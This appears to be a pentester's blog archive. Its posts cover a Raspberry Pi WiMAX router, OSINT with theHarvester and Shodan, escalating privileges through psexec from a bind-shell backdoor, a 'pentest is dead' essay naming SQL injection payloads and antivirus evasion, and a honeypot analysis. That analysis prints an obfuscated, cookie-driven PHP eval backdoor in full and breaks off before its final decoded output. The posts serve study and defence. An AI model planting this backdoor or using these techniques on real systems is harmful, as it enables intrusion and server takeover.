<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuohoA___R2xw_59XO0-etNXglJ3t7gPPabQGsrNcDeA0VcOfKtrI8wgDW16v28eAjHZUC9VFPAMq1KKLQL4l58bqf9iq9GtBGDRlmDH5lIhEXgrzKOLDOLgIri8zL1l22Ydu1ltts5bwy/s1600/cekikdarah.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuohoA___R2xw_59XO0-etNXglJ3t7gPPabQGsrNcDeA0VcOfKtrI8wgDW16v28eAjHZUC9VFPAMq1KKLQL4l58bqf9iq9GtBGDRlmDH5lIhEXgrzKOLDOLgIri8zL1l22Ydu1ltts5bwy/s1600/cekikdarah.png" height="213" width="320" /></a></div>
<br />
<br />
As a poor Malaysian living in a terrible times. What should I do? Relying on Facebook/KingJason/Politician Photoshop/news is not going to help . Time to start our simple hacks!<br />
<br />
<br />
<br />
<br />
<b>Hardware Requirement</b><br />
1. One Unit Raspberry Pi<br />
2. Yes Go Dongle<br />
3. TP Link MR3040 Portable 3G/4G Router configurable as our wifi broadcaster + portable powerbank<br />
4. 8GB Sdcard<br />
5. RJ-45 cable .<br />
6. A Micro-Usb cabled to power up the USB Pi.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZJuUH_iF3uoAvIJPLDpRa__yqBN0ycD-rM8Af1EMVkIc1kQSapvRYCroqZBIcdn2F1x5y7azJ2QvghzFjVYztgxyL8LUIJeSaSO6LkkQLPj8e1ao94kYSTGBLLIhxgh0QKqe7RMsveRsT/s1600/raspberry-pi.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZJuUH_iF3uoAvIJPLDpRa__yqBN0ycD-rM8Af1EMVkIc1kQSapvRYCroqZBIcdn2F1x5y7azJ2QvghzFjVYztgxyL8LUIJeSaSO6LkkQLPj8e1ao94kYSTGBLLIhxgh0QKqe7RMsveRsT/s1600/raspberry-pi.jpg" height="210" width="320" /></a></div>
<br />
<b>Software Requirement</b><br />
<br />
1. Arch Linux as the OS<br />
2. <a href="https://code.google.com/p/gctwimax/">gctwimax driver</a><br />
3. dnsmasq<br />
4. iptables rules<br />
<br />
Instruction ..<br />
<br />
1. Copy Arch Linux ARM image to our sdcard ... If you are using Windows . you can use <a href="http://fedoraproject.org/wiki/Fedora_ARM_Installer">Fedora ARM Installer</a>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://gallery.fabian-affolter.ch/albums/userpics/fedora-arm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://gallery.fabian-affolter.ch/albums/userpics/fedora-arm.png" height="127" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
2. Compile gctwimax should be easy </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
3. configure dnsmasq.. Quite easy in my case 4 lines .only</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<blockquote class="tr_bq" style="clear: both; text-align: left;">
<b>no-resolv</b><br />
<b>bind-interfaces</b><br />
<b>interface=eth0</b><br />
<b>dhcp-range= 192.168.150.10,192.168.150.100</b></blockquote>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
U might also need to actually set the eth0 static on next boot. this can be accomplished by changing /etc/netctl/eth0 to static and give it 192.168.150.1</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
4. <b>sysctl net.ipv4.ip_forward =1 </b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
5. Create two systemd scripts seperately. First script is to lauch gctwimax code so that it will give us wimax0.. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
gctwimax will read configuration from /usr/share/gctwimax/gctwimax.conf like this</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>gctwimax -C /usr/share/gctwimax/gctwimax.conf</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
U need to change the following config to this config below</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>cert_nv=0</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>anonymous_identity="RANDOM@yes.my"</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>username="yourownusername@yes.my"</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>password="yourownpassword"</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
6. Second script is to load dnsmasq configuration. We also need to add an iptables rule to forward all our request to wimax0. This can be accomplished by MASQUERADE it.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>iptabes -t nat -A POSTROUTING -o wimax0 -j MASQUERADE.</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
6. Configure TP-LINk Portable router into a WAN Mode.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
7. You are ready.!!!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
How much does this cost compared to Yes Huddle?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Yes Huddle~<b>RM399</b></div>
<div class="separator" style="clear: both; text-align: left;">
Feeling~ Crap</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Mine:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul style="text-align: left;">
<li>Raspberry Pi ~ RM110</li>
<li>YesGo ~ RM40</li>
<li>TP-LINK MR3020 ~ RM99</li>
<li>Random SD card class10 ~RM16</li>
<li>Awesomeness ~ Priceless</li>
<li>Total= <b>RM265</b></li>
<li>Saved= <b>RM134</b></li>
<li>And we have HDMI output how f**&U* cool is dat?</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Screenshots of success .</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFA9h0Gjvl7mZwNlZZDdCDYtjnhRCP6oivE0S7XyEAPyxdYYiYVkcr3amwfsLXB6602XBic8L3yhFTBGzTXiC1e8TFq3x9DpC1eo443CgHm20SL92R3LNKcY8mkveGwWNDaJZkiscUCD8t/s1600/photo+(4).JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFA9h0Gjvl7mZwNlZZDdCDYtjnhRCP6oivE0S7XyEAPyxdYYiYVkcr3amwfsLXB6602XBic8L3yhFTBGzTXiC1e8TFq3x9DpC1eo443CgHm20SL92R3LNKcY8mkveGwWNDaJZkiscUCD8t/s1600/photo+(4).JPG" height="240" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
wimax0 is up and working correctly.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_xXDWoCszZfRyixLEdvInXSWmZRF9J5iqZ21CUmBw_YmwZYzml7yPRijj5Y5fFc3c5VA3m4pCIbnr70NXAcmsdlKWdh6Hzf70SPHhK6iuF_xPq44arNjUwIOBEFMwPr6GeAqaxTkHCIp0/s1600/photo+(5).JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_xXDWoCszZfRyixLEdvInXSWmZRF9J5iqZ21CUmBw_YmwZYzml7yPRijj5Y5fFc3c5VA3m4pCIbnr70NXAcmsdlKWdh6Hzf70SPHhK6iuF_xPq44arNjUwIOBEFMwPr6GeAqaxTkHCIp0/s1600/photo+(5).JPG" height="240" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Infinite power cycle (Kididng)</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvabpmu1XlkLRFqFJaxVyKXNXu_8oJVyIk63GVBAvzaMfppElvhOMjov1nwOrJimEe8omLx7OuLraOR0FZq_bgjYW1gMPiqEjLgEag00yzZHY9PEV7AUlbS3KWqClzQBy2moITGBFmABag/s1600/1623786_10202892799176408_975838911_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvabpmu1XlkLRFqFJaxVyKXNXu_8oJVyIk63GVBAvzaMfppElvhOMjov1nwOrJimEe8omLx7OuLraOR0FZq_bgjYW1gMPiqEjLgEag00yzZHY9PEV7AUlbS3KWqClzQBy2moITGBFmABag/s1600/1623786_10202892799176408_975838911_n.jpg" height="240" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Working perfectly at our secret mapley.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Rooms for improvement.</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul style="text-align: left;">
<li>Getting a good nano wifi card to setup as a hotspot.. Cables are messy.</li>
<li>Implementing 16x2 LCD for lulz.</li>
<li>Understanding conditional systemd. I miss sys-v/init but hey systemd is not dat bad in fact it's easier.</li>
</ul>
<div>
I've already make a plain backup images but unfortunately the size of my backup image is 8GB which is quite big. I`m uploading it at mega. Once finished i update the links to my image here.</div>
<div>
<br /></div>
<div>
Cheers for No4G..</div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Update:<br />
<br />
Here's the link for my image <a href="https://mega.co.nz/#!fQk3gSRT!eQI8e9E_51odQF2LsShzjghmA3jt6UBDi2M37EovV8c">archlinuxyes4g.bin</a><br />
<br />
<br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-78736458684481372632014-02-28T13:15:00.002+08:002014-02-28T13:15:48.253+08:00OSINT Tricks: Combining Shodan + The Harvester<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="https://code.google.com/p/theharvester/">The Harvester</a> is a good tools for data mining enumeration during RECON/Information Gathering period. On version 2.2a the harvester support integration with <a href="http://www.shodanhq.com/">SHODAN</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl1c1_Aa28BFbqRKxGfxMYs_ruOLYlMEi6X_tyHKQrNvF5_w9Y2vdry1hai9vzT3HjZtcrYdu7nY_j0T1IFgxuPpwJvlzcIk_T-I3wY361FjkL6VwyWoVZTdbT2yTHM1meeH3gO_wpb91S/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl1c1_Aa28BFbqRKxGfxMYs_ruOLYlMEi6X_tyHKQrNvF5_w9Y2vdry1hai9vzT3HjZtcrYdu7nY_j0T1IFgxuPpwJvlzcIk_T-I3wY361FjkL6VwyWoVZTdbT2yTHM1meeH3gO_wpb91S/s1600/Capture.PNG" height="222" width="320" /></a></div>
<br />
In order to use SHODAN services in the Harvester you need to supply the API key . So if you try to use it without supplying the SHODAN API Key.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0ES5IG07ggcPlaEffJ0Ve9WEf0HVxJbVYzODNpuQW4TNAVLFAzJhBlmzcUJ3X4MvzJG4vHoNSZ_uqHFfRM4M6aOcfIrN2GSvUCacWWkYScDQ9I-QoBgGNSRi45_6vLKdit5oGCWY07Xzm/s1600/Capture2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0ES5IG07ggcPlaEffJ0Ve9WEf0HVxJbVYzODNpuQW4TNAVLFAzJhBlmzcUJ3X4MvzJG4vHoNSZ_uqHFfRM4M6aOcfIrN2GSvUCacWWkYScDQ9I-QoBgGNSRi45_6vLKdit5oGCWY07Xzm/s1600/Capture2.png" height="249" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
There is not a proper documentation on how to supply the the Shodan API key but after reading the source code , you need to supply the key at discovery/shodansearch.py</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhldhJ7dLxIdqC-BT5XQZOOcUtWOv0XRrdf_Ysan4zgZkZD44VpcWuQ3WGmWOPq_VaWY9hqwvOCQJGeDgW9aCqIVUI4sWlTHwutsU-fsv6rR6UcknuCeMiQZg75YcjG2s0zfE6d2zjcbXH3/s1600/Capture3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhldhJ7dLxIdqC-BT5XQZOOcUtWOv0XRrdf_Ysan4zgZkZD44VpcWuQ3WGmWOPq_VaWY9hqwvOCQJGeDgW9aCqIVUI4sWlTHwutsU-fsv6rR6UcknuCeMiQZg75YcjG2s0zfE6d2zjcbXH3/s1600/Capture3.PNG" height="120" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
After supplying , the results for information gathering/stalking becoming much more useful.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4fFJhRr9qNxkhAMtVXe260ckLQDQHTpLC2WPZSOYpX-aBX0iLRan3hb2XsgxJqZanyL2UtOWTs-YdZP_kvfAlnOcBaffLC04V-ZpXIugQ86uYObUUSI0xzgTJ6zh71z65bYWKHwxAcxGy/s1600/capture4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4fFJhRr9qNxkhAMtVXe260ckLQDQHTpLC2WPZSOYpX-aBX0iLRan3hb2XsgxJqZanyL2UtOWTs-YdZP_kvfAlnOcBaffLC04V-ZpXIugQ86uYObUUSI0xzgTJ6zh71z65bYWKHwxAcxGy/s1600/capture4.png" height="250" width="320" /></a></div>
<br />
<br /></div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-4865819153630384661.post-45988571408839153412014-02-02T14:05:00.000+08:002014-02-02T14:32:09.827+08:00Uploading files on an interactive windows shell. Part 2 ..<div dir="ltr" style="text-align: left;" trbidi="on">
Based on <a href="http://y0nd13.blogspot.com/2014/01/leveraging-psexec-to-execute-privileged.html">previous post</a>. A reader ask me how the heck should i get a psexec uploaded on the system on the first place? Good question..<br />
<br />
First technique introduced by our favorite vendor of all time. That's right folk microsoft...!!!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghzTrXsFPU74q-UAioKukuiKhLq413jO-uBf7oXPxlfIwzO9cKR78XkUf7crlUA_sBwHmTdAkPr2yC_cRkDd4DFC7WeddkpFowxrsne8p-nxCWiJU4gaIrBSNqQYF7CtrB1vCYFqhyphenhyphenka1Z/s1600/fak1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghzTrXsFPU74q-UAioKukuiKhLq413jO-uBf7oXPxlfIwzO9cKR78XkUf7crlUA_sBwHmTdAkPr2yC_cRkDd4DFC7WeddkpFowxrsne8p-nxCWiJU4gaIrBSNqQYF7CtrB1vCYFqhyphenhyphenka1Z/s1600/fak1.png" height="47" width="320" /></a></div>
<br />
If you don`t believe me..<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQganl2dg4AVnYVRSR1Nox-NhxV8z2NVNcU1r6WdUWrJgBtsELx_nv00u52h2ysi96zPFvdR2r6wSji6jey-hazW_-I7muqtfHnx9OaBMItIcm0p2eCZEewBul8xiQF2gixeW3qupVdatJ/s1600/fak2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQganl2dg4AVnYVRSR1Nox-NhxV8z2NVNcU1r6WdUWrJgBtsELx_nv00u52h2ysi96zPFvdR2r6wSji6jey-hazW_-I7muqtfHnx9OaBMItIcm0p2eCZEewBul8xiQF2gixeW3qupVdatJ/s1600/fak2.PNG" height="146" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
2nd technique. What happen if our firewall blocked SMB/WebDAV protocol.. Then we can upload it back manually using VB Script as describe by SK Chong in <a href="http://www.phrack.org/issues.html?id=7&issue=62">Phrack Issue 62</a> at 6.b</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXA4zjaXMaAVm7Zcq8IkuszUDwcp2YIHSO2Hi_f8wmGoOWIxT9L2jEjtznRCLo3-_jGQ8KQvv28-m4btES_fBCFUvtvKoZ5eLDQd-JFx4xourX14lCn1fweA2U5npPGWr20MpIl4cZYg-s/s1600/fak3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXA4zjaXMaAVm7Zcq8IkuszUDwcp2YIHSO2Hi_f8wmGoOWIxT9L2jEjtznRCLo3-_jGQ8KQvv28-m4btES_fBCFUvtvKoZ5eLDQd-JFx4xourX14lCn1fweA2U5npPGWr20MpIl4cZYg-s/s1600/fak3.PNG" height="320" width="271" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
3rd. Technique. If we are on Windows 7/2008/8.1 . Hello One Line Powershell </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeG0wyM4vI0JcmlAY8ogIBLFnRCf1QpFNj6Vw2aKEfffsMRbTkdg8sXB0FUZI00v2aVzBZyHPvS_622jZpN3MUymZ7xlI1H1dQsFcwKVz6oKfTr2b9EFN343_MnXsnZ-dbbF0qqFl0lKYK/s1600/fak4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeG0wyM4vI0JcmlAY8ogIBLFnRCf1QpFNj6Vw2aKEfffsMRbTkdg8sXB0FUZI00v2aVzBZyHPvS_622jZpN3MUymZ7xlI1H1dQsFcwKVz6oKfTr2b9EFN343_MnXsnZ-dbbF0qqFl0lKYK/s1600/fak4.png" height="101" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
Endless imagination.</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-69981624276351960512014-01-31T16:55:00.004+08:002014-01-31T16:59:18.278+08:00Leveraging psexec locally to execute privileged command..<div dir="ltr" style="text-align: left;" trbidi="on">
Gong Xi Fa Choy to all of you. Not really a good start year for me, my daughter is sick. But I need to go to Jakarta next week to teach a Digital Forensics/Anti-Forensic class. Okay anyway this is another trick to use sysinternal tools in a hackish way.<br />
<b><br /></b>
<b>Case Study</b><br />
<br />
<ol style="text-align: left;">
<li>In a social engineering campaign attack, you managed to pivot your way into a machine with low privileged (guest) windows access machine.</li>
<li>You have an admin privileged username and password but RDP is impossible or runas doesn`t work.</li>
<li>Ingress/Outgress Firewall kicked in.. so psexec remotely is impossible.</li>
<li>For Fun!!!!!</li>
</ol>
<div>
Suppose a we backdoored a normal user with a bind shell at port 4444</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXRQu4fVP5GWnNW8spoKRfrkIxRun-aRpQQkV8jT-RHE_DgRuhKIB8Q-8pIJmZqjq9VeMZEfZGWcZxsiYzRLhCTNogy0Vf8ljyRVl-IxTkoz8AkO3wvrw68cHsgTS62WtbFlA8ft2U_yyD/s1600/capture1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXRQu4fVP5GWnNW8spoKRfrkIxRun-aRpQQkV8jT-RHE_DgRuhKIB8Q-8pIJmZqjq9VeMZEfZGWcZxsiYzRLhCTNogy0Vf8ljyRVl-IxTkoz8AkO3wvrw68cHsgTS62WtbFlA8ft2U_yyD/s1600/capture1.PNG" height="168" width="320" /></a></div>
<div>
<br /></div>
<br />
As you can see add user is kinda impossible due to limited priviledge. Let's assume we know the password of user <b><i>admin </i></b>which is <i style="font-weight: bold;">admin123 . </i><i> </i> Can we use <b>runas </b>command?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9ZZlP47F8tc1-eNhGnwSxxUF0twrCLPmgTNduz3-wjftm8iT0NyNT_Ky7-HYeQzReajH8L-0hn-BbtJaLKmb7zINznSpzfmrA7UynkN09SyDbjANyK-dJ7gTwdPW-pgY2Vl0hWJuR42QV/s1600/capture2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9ZZlP47F8tc1-eNhGnwSxxUF0twrCLPmgTNduz3-wjftm8iT0NyNT_Ky7-HYeQzReajH8L-0hn-BbtJaLKmb7zINznSpzfmrA7UynkN09SyDbjANyK-dJ7gTwdPW-pgY2Vl0hWJuR42QV/s1600/capture2.PNG" height="98" width="320" /></a></div>
<br />
It seems our runas command failed due to the fact that our bindshell backdoor is an interactive shell that couldn`t compensate normal stdin..<br />
<br />
All hope is loss? Nope we can use psexec to bypass this circumstances. I would say "<b><i>psexec is like sudo</i></b>" <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgalWtgbkiH18OGrTxX4i8ZZl2nbI0IRT20Gy8OjIFzjMrfL7s_rB5dccwmnOBX3z_jsWdkbRk-UXQDeQ2FZmaVyN7Nv2FEYXb2gdaG51rlAYhKuF6YVfk4B8GejYU4NRJAbYmE71wP5O1j/s1600/capture3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgalWtgbkiH18OGrTxX4i8ZZl2nbI0IRT20Gy8OjIFzjMrfL7s_rB5dccwmnOBX3z_jsWdkbRk-UXQDeQ2FZmaVyN7Nv2FEYXb2gdaG51rlAYhKuF6YVfk4B8GejYU4NRJAbYmE71wP5O1j/s1600/capture3.PNG" height="121" width="320" /></a></div>
<br />
<br />
Why do I like psexec? I believe internal tools is the "<i><b>universal windows backdoor</b>."</i><br />
<i><br /></i>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKtWn6Vmd2aTqJQug7y9XFHbM9ku_XkFQZmR_z-aLfI87aPnt703zEck4nJdFk2lPl0W4pF_eP7p6eGBgzvGB3QsgrNVXi5Hd0LaW5sgDLlTZCa2F76HFO5lJ9KFHiwqa82teZ0cF71sei/s1600/capture4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKtWn6Vmd2aTqJQug7y9XFHbM9ku_XkFQZmR_z-aLfI87aPnt703zEck4nJdFk2lPl0W4pF_eP7p6eGBgzvGB3QsgrNVXi5Hd0LaW5sgDLlTZCa2F76HFO5lJ9KFHiwqa82teZ0cF71sei/s1600/capture4.PNG" height="105" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
This idea pops up thanks to stackoverflow<a href="http://stackoverflow.com/questions/12456675/single-line-command-for-run-as-different-user-in-window-7-that-contain-password"> http://stackoverflow.com/questions/12456675/single-line-command-for-run-as-different-user-in-window-7-that-contain-password</a></div>
<i><br /></i></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-31756995723074299562014-01-02T18:13:00.002+08:002014-01-02T18:30:07.484+08:002014: The Age of Pentest Apocalypse.<div dir="ltr" style="text-align: left;" trbidi="on">
Happy new year everyone.<br />
<br />
We are entering 2014. After doing pentest for so many years.... I can safely say "<b>Penetration Testing is Dead</b>". <a href="http://defcon.org/images/defcon-16/dc16-presentations/defcon-16-banks-carric.pdf">I am not the first person to declare such statement</a> . Popping a remote shell and rooting is quite challenging for the last 2 years (<i>challenging but not impossible</i>).<br />
<br />
<b>Summary from year 2013</b>.<br />
<br />
1. Secured Framework is being deployed widely .<br />
2. IPS/IDS being deployed widely (Juniper/Bluecoat/blax3) .<br />
3. HIPS becoming quite common (whitelisting application)<br />
4. SQL Injection /XSS /Remote Code Exec still exist . But no longer straightforward ,it's quitre rare to see ' or 1=1 # , but sometimes ' or RAND() > 0.5 still works , wide usage of WAF<br />
5. VA is deadly inaccurate...... (<i>it might cover most but not all</i>).<br />
6. Local clients are willing to sign up for more offensive security testing approach. (brutefoce attack , sniffing etcx3).<br />
7. Weak/Default credential seems to be the weakest link of all time.<br />
<br />
<b>mandatory Skills required in this age.</b><br />
<b><br /></b>
1. The Art Of Tunneling and Pivoting... It's mandatory to mitigate firewall.<br />
2. Bypassing Antivirus IDS IPS.. need to say more, implementing own VM....<br />
3. Bypassing HIPS, executing unlisted/blacklisted binary outside whitelist domain usually windows<br />
4. Bypassing noexec()... knowledge on ld based rootkit might help. usually nix<br />
5. Forensics and Anti-Forensics technique.<br />
6. Modifiying PoC exploits to suitable your needs.. ms08-067 is just not there anymore lolz.<br />
<br />
Expect to see more revolution in 2014 pentest.!!!<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/cQyqvA8geac" width="420"></iframe>
<br />
<br />
P/S: If someone comes and around and **shitng u about great Tools. Tell em pentest is dead.<br />
<br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-79427346716990690972013-11-19T09:16:00.001+08:002013-11-19T09:16:16.191+08:00Iloveyou PHP Backdoor<div dir="ltr" style="text-align: left;" trbidi="on">
One of my botnet eh honeynet managed to caught up this nifty PHP script.<br />
<br />
<pre>$sdfv="oofJGEpofPjMpeyRrPSdvofdmVof5b3UnofO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19";
$kisg = str_replace("ar","","sartarrar_rarearparlaracare");
$ltjz="yZofXBsYWNlKGFycmofF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhofcnJofheSofgnJywnKycpL";
$ynsx="CBqb2luKGFycmF5X3NsaWNoflKCRofhLofCRjKCRhKS0zKSofkpKSkof7ZWNobyAnofPC8nLiRrLiofc+Jztof9";
$dkhg="JGofMof9J2NvofdW5of0JzskYT0kX0NPT0tofJRTtpZihyZXNldCgkYSk9ofPSdpbCcgJiYgJGMof";
$gsqn = $kisg("dk", "", "bdkadksdkedk64dk_dkddkecdkode");
$zuzt = $kisg("z","","zczrzezatze_zfzuznzcztzion");
$lyyq = $zuzt('', $gsqn($kisg("of", "", $dkhg.$sdfv.$ltjz.$ynsx))); $lyyq();?></pre>
<br />
It's pretty much straight forward just by having a glance on it.<br />
<br />
$kisg = is actually string_replace<br />
$gsqn = base64_decode<br />
$zuzt = create_function<br />
<br />
Cleaning this bad ware stuff will give us<br />
<br />
<pre>$lyyq = create_function(base64_decode("JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdpbCcgJiYgJGMoJGEpPjMpeyRrPSdvdmV5b3UnO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9"));</pre>
<br />
Final Output:<br />
<br />
